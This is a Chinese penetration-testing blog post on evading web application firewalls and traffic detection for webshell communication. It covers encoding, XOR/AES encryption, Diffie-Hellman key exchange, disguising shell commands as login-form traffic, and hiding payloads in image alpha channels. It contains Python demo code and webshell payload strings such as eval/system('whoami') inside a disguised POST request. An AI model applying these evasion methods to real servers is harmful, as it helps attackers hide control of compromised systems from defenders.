浅谈几种绕过流量检测的方法

渗透技巧 2年前 (2022) admin

592 0 0

近几年做渗透测试的时候总是遇到流量特征太明显而被拦截甚至封IP的情况，每次都要耗半天劲去想办法，甚至尝试过改造蚁剑的编码器，奈何NodeJS的功底太差（甚者可以说不会）写到一半就烂尾了。于是就开始自己用Python写了个简单WebShell管理器来绕过流量检测，当然这东西都是后话，这个文章主要还是为分享一下自己的一些绕过思路。

前言：

本文大概3000字，请合理分配阅读时间。

本文中的代码为了用来演示而写的，不代表最后的成品脚本。

此文中的所有方法以客户端和服务器中间的WAF不知道服务器上Web Shell的文件内容为前提。

此文当中默认当web shel是免杀，所以不考虑shell被杀的问题。

一、编码

编码是最常见的绕过方式，像蚁剑这种就是使用编码的典型工具。常见的编码也就是base64、URL、Hex、Unicode之类的了，所以编码这块儿本文不再过多阐述。

二、加密

加密也是常用的绕过流量检测的方法，比如冰蝎、哥斯拉这两个web shell管理工具就是使用加密来绕过流量检测（虽然说现在会被拦截了，但是刚发布的时候是还是很稳的）。常用的加密方式一般是XOR、AES等对称加密方式（这里暂时不考虑RSA这种非对称加密，这东西简直是bug一般的存在）。这种对称加密有个很大的弊端：

动态的密钥会在HTTP包里泄露。
静态密钥容易被机器学会特征。

1、动态的密钥会在`HTTP`包里泄露

以冰蝎的动态密钥为例：

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2022 15:28:43 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=s9e7ldh4sogigtbuq4u8hqnr14; path=/
Connection: close
Content-Type: text/html
Content-Length: 16

3f2a8ede95042ddc

这个是第一次请求时交换的密钥，之后就会以3f2a8ede95042ddc来进行加解密，如下面这个POST包

用3f2a8ede95042ddc解密得到：

所以通过这个例子可以看到密钥是泄露在HTTP包里的。

2、静态密钥容易被机器学会特征

在使用一些对称加密算法会因为密码和前几个字节是固定的，导致加密后前几个字符也一直是固定的（部分编码也有这个特征），从而会被WAF给学会特征来拦截。以XOR和AES-ECB来举例：

import random
import string
from Crypto.Cipher import AES

key = 'this_is_key!!!!!'     # 用感叹号填充到16个字符，方便加密
regular_data = "assert|eval(base64_decode('%s'))"  # 以冰蝎的payload为例

def random_char(num):
    return ''.join(random.choices(string.ascii_letters, k=num))

def xor(text: str, key: str):
    result = ''
    for i in range(max(len(text), len(key))):
      result += chr(ord(text[i % len(text)]) ^ ord(key[i % len(key)]))
    return result

def aes_encrypt(text: str, key: str):
    aes = AES.new(key.encode(), AES.MODE_ECB)
    return aes.encrypt(text.encode())

for i in range(10):
    print(xor(regular_data % random_char(10), key).encode())
for i in range(10):
    print(aes_encrypt(regular_data % random_char(16 - (len(regular_data) - 2 + 10) % 16 + 10), key))

# XOR加密
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^mLl{qx12x10;+nNZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^@vk[Sx16?x10x18x14NZv'
# b"x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^PfLIF8-;'8NZv"
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^plBr{x0ctx05%x18NZv'
# b"x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^ictcix17x01x07x19'NZv"
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^kljxTx1ax0cx00x0b5NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^I{vBHx04x05!x17x12NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^uJ@NRx01+;nx16NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^gmDXlx06 /n-NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^MkvTmx05?x19x17<NZv'

# AES加密
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxecx8cx03x0c7xd8xe09>xcecUxc9xe4;x8a5xaaxc3xe2x08xcax99Ox1dGx99Wxd8x80vs'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxa5xfaxcef5xeeMxb2x92xf3x02xf6x82>k`x82xd7d{x13x02Rxf9yxb697xc2x87x98x12'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSx83pxa5rxdaxf3x8bx99{x13Vxa8rx9dZxf4&35x03TxabxabxxdcN)x81xbdlx1ex03'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxa3xf1xabxf1Zxb9xc1x98Lxc1Bx97xeeVx04xdaxbfeufxf9xa5T{[x07xc1[xcdxd9(xf2'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxc4oh"K!x1ax8dWx95\xfax8e^xbc@Yxaexe8x07x10(nX}ex00Ix8el_o'
# b"x9c(_63xb9x94xa5x99sUx99\3x8aSex97x17Gx7fx87xb0xa8x16E|xf3x17xbdx82x11'x8fxc9xb0bxb6xaaxd9xdbxffxb7Txd6x00xa0xa9"
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxeexe3xd4wxafgkxf2xcdx89%x866xb3=(x9cxffjxe2x7fx98xb9x06jg]xccSx1fxabxe6'
# b"x9c(_63xb9x94xa5x99sUx99\3x8aSx1c.a'g>xbax9awTGx0bx16xef7x88xccx84x0fpxad.x0cL;x9dxd0cxfaxccva"
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSoNx1c3xc0Hxc0Fx9cxf7xfbx96rx99x94xecIx1f{x90xc8xecx01,H(xcc vW&x1f'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aS4xd1x05xabDIx9a0x7fx98^xfdx80`/x81Ix0bXx8cxb7x10xc6x10xe5xb3x93rxcbxdfzx0c'

如上面的代码所示，可以看到不论是XOR还是AES加密，因为密钥和明文的前几个字符是固定的（AES要求一组为16字节，所以最少要16个字符是固定的才行，当然并不是所有的模式都这样，比如AES-CBC就不会），最后导致的就是前几个密文每次都一样，很容易被机器学习给学会特征

3、怎么办呢？

其实解决方法不难，那就是大名鼎鼎的Diffe-Hellman算法，这个算法一般用在密钥交换上，刚好可以用在这里。具体的算法如下图所示

其中：a、b、p都是素数，g任意。用代码尝试一下

import random

a = 13
b = 11
p = 7
g = random.randint(10, 20)
A = g ** a % p
B = g ** b % p
print(A ** b % p == B ** a % p)
# True

所以在实战环境中，服务端可以通过第一次请求获得的g、p、A来计算出K然后存到session当中并返回自己的B，这样不仅可以在后续的请求中直接使用K来进行加密通信而不被WAF发现的同时还可以随时更换密钥。

三、混淆

混淆也是躲避流量检测设备的有利方法之一，其鼻祖个人认为应该是ShadowSocksR了，它的混淆模式方便了许多人上网。至于SSR具体的原理这里先开个坑，若想了解可以上网搜索。在实际环境中使用加密是为了防止中间人截获我们原始的payload，虽然加密也能起到绕过流量检测设备的作用，但有时候也可能会因为频繁请求而被识别为恶意流量，这时候就需要将我们加密后的（或原始的）payload进行混淆来防止被流量检测设备识别。

1、根据网站原始页面进行流量仿造

一般网站正常情况下不是返回HTML和图片就是返回JSON和XML（使用JS进行自加密发送的情况不考虑），所以可以提前定义好请求信息和响应信息，在后续的请求中按照格式去请求。举个例子，以登录页面为例，加入登录页面有一个登录接口，POST了username和password，并且返回信息是一段HTML，则可以将Web Shell伪装成这个接口。则理想的请求信息应该如下：

请求信息：

POST /shell.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html
Connection: close

username=admin&password=assert%7Ceval%28%27system%28%22whoami%22%29%27%29&submit=%E7%99%BB%E9%99%86

响应信息：

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2022 15:28:43 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html

<html>
  <head>
    <script src="/static/js/jquery.js"></script>
    <title>登录</title>
  </head>
  <body>
    <div class="form-control">
      <p class="form-error">NT AUTHORITYSYSTEM</p>
      <form class="form-block" action="/shell.php" method="post">
        <input class="input-block" type="text" name="username" />
        <input class="input-block" type="password" name="password" />
        <input class="input-block" type="submit" name="submit" value="登录" />
      </form>
    </div>
  </body>
</html>

根据上面的请求信息和响应信息，不难看出shell的链接密码是password，而返回的结果是<p>NT AUTHORITYSYSTEM</p>，也就是包裹在了原来本应该显示错误信息的地方，这样就做到了上面说到的仿造正常页面。

2、隐写

隐写是我在CTF当中经常遇到的东西，可以利用其思路将payload的每个字符写入到图片的每个字符当中，其中需要处理的问题是如果payload不够长会填不满图片或者payload过长导致图片不够写。后面的情况可以通过更换更大的图片来变为第一种情况。

而第一种情况则需要填充，我个人偏向于先将payload使用base64编码，消除掉不可见字符，然后再使用不可见字符（如x00、xff等），服务端获取后直接剔除不可见字符再base64解码即可。

以本公众号的logo为例，通过PIL库可以将payload写入到图片的每个像素中的alpha通道中，也就是透明度。

一个使用16位存储的图片，5位表示红色，5位表示绿色，5位表示蓝色，1位是阿尔法。在这种情况下，Alpha值只能为0或1，要么透明，要么不透明；

一个使用32位存储的图片，每8位表示红绿蓝和阿尔法通道。在这种情况下，Alpha通道不只可以表示透明还是不透明，还可以表示256种不同的透明度。

所以我们这里用32位存储的图片。代码如下：

from PIL import Image

payload = 'aseert|eval('system("whoami")')' + ';' * (1200 * 1000)  # 填充脏数据，只为了演示
image = 'logo.png'

img = Image.open(image)
img = img.convert('RGBA')
x, y = img.size

# 确保图片的像素点放得下payload
assert x * y >= len(payload)

# 填充payload到图片像素点的数量
payload = payload + 'x00' * (x * y - len(payload))

for i in range(x):
    for j in range(y):
        color = img.getpixel((i, j))
        new_color = color[:-1] + (ord(payload[i * x + j]), )
        img.putpixel((i, j), new_color)
img.show()
img.save('anioner.png')

这个代码即可做到将字符串隐写到图片当中，效果如下：

如何解密呢？那就是反向操作把RGBA取出来然后把A转成字符串即可。

总结

实际上，上面的那些绕过方式还是有问题的，这里列举一些各自的优缺点。

Diffe-Hellman算法

优点：

1、能够有效防止中间人获取到密钥从而解密流量
缺点：

1、那些素数过小时会导致很容易就被爆破出来密钥

2、如果素数过大（哪怕是3位整数）会导致整型溢出而计算错误

3、需要额外一次请求来获取密钥，增加了特征

页面仿造

优点：

1、增加判断难度，尤其是在配合了加密后

2、管理员的溯源难度增加那么一丢丢
缺点：

1、过多的增加了原来的数据大小，网络环境差时会导致传输很慢的问题

2、若原始的payload未进行加密或编码依然会被检测出特征

图片隐写

优点：

1、无法肉眼判断

2、很少有WAF检测图片

3、随时可以更换隐写载体，如视频、音频等
缺点：

1、数据长度较原始payload增大了很多

2、频繁的POST图片也是一个特征

3、容易被提取，需要加密

其实绕过流量检测设备的方法很多，上面列举的只是我自己一堆想法中的几个，个人认为其中的Diffe-Hellman算法在解决了额外的一次请求之后应该是很无敌的存在。

原文始发于微信公众号（Anion的小黑屋）：浅谈几种绕过流量检测的方法

版权声明：admin 发表于 2022年8月31日上午11:46。
转载请注明：浅谈几种绕过流量检测的方法 | CTF导航

网络钓鱼模拟演练的频率一年多少次合适？

admin

CobaltStrike分析-beacon 解析

admin

347

利用插件逻辑反制Acunetix WVS 扫描器

admin

183

跟我学跟我学 – Shellcode注入技术

admin

748

小程序动态调试-解密加密数据与签名校验

admin

MEGA云存储服务加密可被攻破

admin

644

暂无评论

您必须登录才能参与评论！

立即登录

暂无评论...

浅谈几种绕过流量检测的方法

一、编码

二、加密

1、动态的密钥会在`HTTP`包里泄露

2、静态密钥容易被机器学会特征

3、怎么办呢？

三、混淆

1、根据网站原始页面进行流量仿造

2、隐写

总结

实战 | 商业银行安全纵深防御体系探索与实践

每日安全动态推送(08-31)

相关文章

暂无评论

相关文章

浅谈几种绕过流量检测的方法

一、编码

二、加密

1、动态的密钥会在HTTP包里泄露

2、静态密钥容易被机器学会特征

3、怎么办呢？

三、混淆

1、根据网站原始页面进行流量仿造

2、隐写

总结

实战 | 商业银行安全纵深防御体系探索与实践

每日安全动态推送(08-31)

相关文章

暂无评论

广告位

相关文章

1、动态的密钥会在`HTTP`包里泄露